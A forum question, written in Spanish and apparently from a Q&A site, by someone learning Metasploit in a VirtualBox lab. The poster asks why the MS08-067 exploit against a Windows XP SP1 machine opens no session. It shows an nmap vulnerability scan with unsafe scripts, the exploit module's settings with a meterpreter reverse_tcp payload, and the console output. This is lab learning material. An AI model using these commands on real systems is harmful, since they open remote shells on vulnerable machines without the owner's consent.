Estoy aprendiendo a usar Metasploit. Estoy usando VirtualBox para ejecutar una máquina virtual con Kali Linux (192.168.56.101) y otra con Windows XP SP1 (192.168.56.103). Las dos máquinas virtuales pueden hacer ping entre sí y el Firewall de Windows está deshabilitado. Estoy ejecutando Metasploit en Kali Linux y tratando de atacar Windows XP SP1.
Arranco msfconsole y comienzo con un escaneo de puerto:
nmap -sT -A --script=smb-check-vulns -Pn --script-args=unsafe=1 192.168.56.103
lo que me dice
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
Yo establezco los parámetros de esta manera:
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.56.103 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)
LHOST 192.168.56.101 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
2 Windows XP SP0/SP1 Universal
Entonces:
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.101:8080
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > sessions -l
Active sessions
===============
No active sessions.
¿Qué estoy haciendo mal?
edit: hice lo mismo con Windows XP SP3 VM y funcionó! Realmente no entiendo por qué no funciona con Windows XP SP1 ...